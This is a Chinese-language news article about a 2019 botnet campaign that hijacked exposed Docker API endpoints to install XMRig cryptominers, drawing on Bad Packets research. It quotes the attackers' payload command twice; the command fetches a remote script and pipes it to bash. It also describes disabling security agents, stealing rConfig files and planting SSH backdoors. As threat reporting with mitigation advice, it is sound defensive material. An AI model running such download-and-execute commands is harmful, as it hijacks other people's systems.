黑客集团利用暴露在外的API端点劫持Docker系统


都快2020年了,不少系统管理员还是不知道把Docker管理端口收拾利索

某黑客组织目前正在互联网上进行大规模扫描,旨在寻找各类将API暴露在公开网络之上的Docker平台。

通过扫描,黑客组织能够向这些暴露的Docker实例发出命令,从而在企业Docker实例当中部署加密货币矿工程序,最终神不知鬼不觉地利用他人算力为自己开采代币。

专业行动

本轮扫描始于今年11月24日,是周末,由于规模极为庞大,因此甫一启动即吸引到众多安全人士的关注。

Bad Pockets公司联合创始人兼首席研究官Troy Mursch在采访中表示,“Bad Packets CTI API的用户应该很了解,针对暴露Docker实例的恶意活动并不是什么新鲜事物,而且发生频率很高。”

他指出,“此次扫描的特别之处在于,其扫描规模极为夸张。单此一项,就值得我们投入精力调查攻击者到底想利用僵尸网络搞什么名堂。”

作为本轮扫描行为的发现者,Mursch表示“亦有其他关注者指出,这样的规模绝不是那种脚本小子们的儿童把戏。恶意者在此轮扫描当中投入了大量精力,而且截至目前,我们还没有彻底搞清楚对方到底想干什么。”

此次随机大规模扫描已经检测出大量公开在公共互联网上的Docker API端点。

此轮扫描利用Alpine Linux镜像创建一套容器,同时执行以下负载:

"Command": "chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'",#threatintel

EKQD4nyUcAAyzPe.jpeg

——Bad Packets Report (@bad_packets) 2019年11月25日

目前掌握的情况

截至目前,我们能够确定的是,发动攻击的集团正在扫描超过59000个IP网络(网络块)以寻找暴露的Docker实例。

在该集团发现暴露主机后,攻击者会利用该API端点启动一套Alpine Linux OS容器,进而执行以下命令:
chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;

以上命令用于从攻击者服务器处下载并运行一份Bash脚本。此脚本会在目标设备上安装经典的XMRRig加密货币采矿程序。Mursch指出,此次活动刚刚启动两天,黑客方面已经股票市场出14.82枚门罗币(XMR),价值约为740美元。
2.png

此外,本轮恶意行动还附带防卫机制。

Mursch在采访中指出,“虽然并非原创,但我们在活动中也观察到一种有趣的情况。攻击者通过下载自http://ix[.]io/1XQh的脚本制裁了已知监视代理程序并关闭了大量相关进程。”

查看这份脚本,我们发现黑客不仅在尝试禁用安全产品,同时也关闭掉了LSO进程——此进程可能被其他黑客竞争对手的加密货币采矿僵尸网络(例如DDG)所利用。

此外,Mursch发现该恶意脚本还会扫描受感染主机以查找rConfig配置文件,对其进行窃取与加密,并将文件发送回黑客集团的命令与控制服务器。

Sandfly Security公司创始人Craig H. Rowland则注意到,这批黑客会在成功入侵的容器当中创建后门账户,同时保留SSH密钥以待后续访问。如此一来,他们即可通过远程位置控制所有被感染的肉鸡目标。

Mursch给出的建议是,各位运行Docker实例的用户及组织应立即检查自己是否在互联网上公开了API端点,如果有请立即将其关闭,而后关停一切无法识别的运行中容器。

原文链接:A hacking group is hijacking Docker systems with exposed API endpoints

0 个评论

要回复文章请先登录注册